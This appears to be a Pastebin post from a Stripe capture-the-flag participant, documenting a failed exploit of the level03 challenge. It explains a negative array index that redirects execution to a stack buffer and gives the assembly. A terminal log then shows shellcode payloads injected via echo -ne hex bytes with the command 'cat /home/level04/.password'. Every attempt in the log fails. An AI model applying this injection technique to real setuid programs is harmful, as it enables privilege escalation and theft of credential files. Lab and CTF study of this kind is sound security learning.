SHARE
TWEET

xdissent's level03 fail for stripe ctf

a guest Feb 24th, 2012 460 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. level03 fail - https://stripe.com/blog/capture-the-flag
  2.  
  3. Here's what I'm doing:
  4. A negative 5 index points fns[index] to the (non-truncated) string on the stack, moving %eip there.
  5. The %eax register already has the address of the buffer so I add the length of the payload before the command string and set that as the first value on the stack. Then it calls run() or system directly.
  6.  
  7. asm:
  8.         add $0xd,%eax
  9.         mov %eax,(%esp)
  10.         mov $0x0804875b,%eax
  11.         call *%eax
  12.  
  13. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<run>"
  14. 0804875b <run>:
  15. level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
  16. Segmentation fault
  17. level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -o level03 /levels/level03.c
  18. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
  19. 0804875b <run>:
  20. level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x5b\x87\x04\x08\xff\xd0cat /home/level04/.password"`"
  21. Segmentation fault
  22. level03@ctf5:/tmp/tmp.V4u5A2is0u$ gcc -m32 -fno-stack-protector -z execstack -o level03 /levels/level03.c
  23. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<run>"
  24. 080486fb <run>:
  25. level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\xfb\x86\x04\x08\xff\xd0cat /home/level04/.password"`"
  26. cat: /home/level04/.password: Permission denied
  27. Segmentation fault
  28. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d /levels/level03 | grep "<system"
  29. 0804847c <system@plt>:
  30.  8048767:       e8 10 fd ff ff          call   804847c <system@plt>
  31. level03@ctf5:/tmp/tmp.V4u5A2is0u$ /levels/level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x7c\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
  32. Segmentation fault
  33. level03@ctf5:/tmp/tmp.V4u5A2is0u$ objdump -d ./level03 | grep "<system"
  34. 08048430 <system@plt>:
  35.  8048707:       e8 24 fd ff ff          call   8048430 <system@plt>
  36. level03@ctf5:/tmp/tmp.V4u5A2is0u$ ./level03 -5 "`echo -ne "\x83\xc0\x0d\x89\x04\x24\xb8\x30\x84\x04\x08\xff\xd0cat /home/level04/.password"`"
  37. cat: /home/level04/.password: Permission denied
  38. Segmentation fault
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top